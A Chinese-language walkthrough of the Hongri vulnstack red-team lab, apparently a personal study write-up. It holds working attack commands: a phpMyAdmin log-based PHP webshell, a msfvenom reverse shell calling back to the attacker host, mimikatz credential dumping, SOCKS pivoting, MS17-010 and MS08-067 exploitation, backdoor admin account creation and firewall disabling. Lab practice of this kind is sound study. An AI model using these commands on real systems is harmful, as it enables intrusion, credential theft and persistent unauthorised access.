ATT&CK实战系统-红队实战(一)
很久之前放到收藏夹里的红日靶机,之前总想着汇总一下打一打,但是硬盘没有太大空间就没有去下载搭建(其实就是懒),最近写毕设的过程中无聊换换脑子来打一打。
靶场下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
靶机配置
靶机有三台。
Win7:内 192.168.52.143 外 192.168.31.245
Win Server 08:192.168.52.138
Win Server 03:192.168.52.141
本机Mac(攻击机):192.168.31.222
三台机器密码都是 hongrisec@2019
Win Server 08登陆以后强制要求修改密码
密码更改为 qwertyuiop123.
在win7上测试一下,能ping通Mac和Windows2003、Windows Server 2008
Mac无法ping通win7,因为win7开了防火墙,更无法ping通内网中的2003和2008;
开启win7的phpstudy,我们开始外网渗透。
外网渗透
nmap扫一下看看 win7开放了哪些端口。
直接访问80 发现是phpstudy探针
暴露了网站的绝对路径为C:/phpStudy/WWW
dirsearch扫描网站目录看看,这里用我自己扫描器试试。
扫到了phpmyadmin。
phpmyadmin是可以getshell的
phpmyadmin写shell
访问phpmyadmin 弱口令 root root登录之。
通过开启日志写shell,这里简单说一下。
show variables like 'general%';set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/shell.php';SELECT '<?php eval($_POST["cmd"]);?>'一句话写进去以后蚁剑链接看看
因为是phpstudy是Administrator。
可见是双网卡,还有一个内网网卡为
并且还有域存在。
反弹shell
接下来为了后续内网,准备上线到msf上。生成一个.exe上传到服务器并执行。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.222 LPORT=4444 -f exe -o msf.exe本机Mac进行监听
使用exploit/multi/handler模块开启msf监听;
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.222
set lport 4444
run
getuid查看当前会话权限
getsystem自动尝试提权
未开放3389端口
执行run post/windows/manage/enable_rdp开启3389端口
开启以后可连接。
密码抓取
首先msf加载mimikatz
load mimikatz
creds_msv 获取密码hash值
creds_kerberos 获取密码明文成功抓取到了登陆密码。
内网渗透
Arp -a查看路由表
可见网段192.168.52.0/24,还有另外两台主机;
run autoroute -s 192.168.52.0/24添加录路由;
run autoroute -p查看路由;
设置代理方便访问内网服务。
search socks
use auxiliary/server/socks_proxy
set srvhost 192.168.31.222
set srvport 1088
run
然后修改vim /usr/local/etc/proxychains.conf的最后一行为socks5 192.168.31.222 1088
测试一下能否顺利访问内网主机
接下来我们就扫一下另外两台主机
192.168.52.138
192.168.52.141
都开启了哪些端口
使用msf自带的 portscan
auxiliary/scanner/portscan/tcp模块;
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set threads 100
run速度感觉。。有点慢
445和135端口,说明都有SMB服务
使用auxiliary/scanner/smb/smb_version扫描系统版本进行验证
判断系统版本为03
看到445难免想到经典的17010,来验证一下。
MS17-010
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.52.141
run
失败了。百度了一下可以换一个这个模块试试看
auxiliary/admin/smb/ms17_010_command模块执行命令;
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command whoami
run发现此模块可行。
那就利用此模块我们添加一个管理员组的用户。并开启3389端口
set command net user pocsec zxcvbnm123. /add添加用户;
set command net localgroup administrators pocsec /add添加管理员权限;
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'执行命令开启3389端口,这里要么用单引号把命令引住,要么用反斜杠对反斜杠和引号进行转义,否则会出错;添加了无数次本机查看都没有成功,后来发现某大佬写的文章原来是
是因为有密码设置策略,密码不能太简单且不能包含用户名。
密码复杂一点就好了
或者直接exploit/windows/smb/ms17_010_psexec反弹一个shell过来。
MS08-067
我们用08067去打一下试试看
use exploit/windows/smb/ms08_067_netapi
set rhosts 192.168.52.141
# 设置payload
set payload generic/shell_bind_tcp
# 设置自动类型
set target 0
run
至此这台03也被我们拿下。
接下来那台08 也是存在17010,来试试看
接下来和拿2003主机一样的操作,依然可以用auxiliary/admin/smb/ms17_010_command模块执行命令;
因为开启了防火墙,我们先执行命令set command netsh firewall set opmode mode=disable关闭防火墙;
然后我们用这个模块exploit/windows/smb/ms17_010_psexec反弹一个shell过来
注意直接反弹不能成功,先用ms17_010_command执行关闭防火墙命令,在反弹则成功。
可见三台机器都已经被我们拿到了。
到此结束。
总结
nmap探测端口,获取80端口,dirsearch扫目录发现phpstudy探测界面和phpmyadmin。
弱口令进入phpmyadmin 经典的phpmyadmin日志写webshell。最后上线到msf提权。
后添加路由,查看路由表发现其他两台机器,内网用nmap(这里我上面吗没演示)实际上用nmap验证了一下,发现两台机器存在17010和08067最后使用这两个漏洞打下来这两台主机。
其实自己做的过程中没有用到域渗透的东西,等后续其他靶场多换换姿势学一下。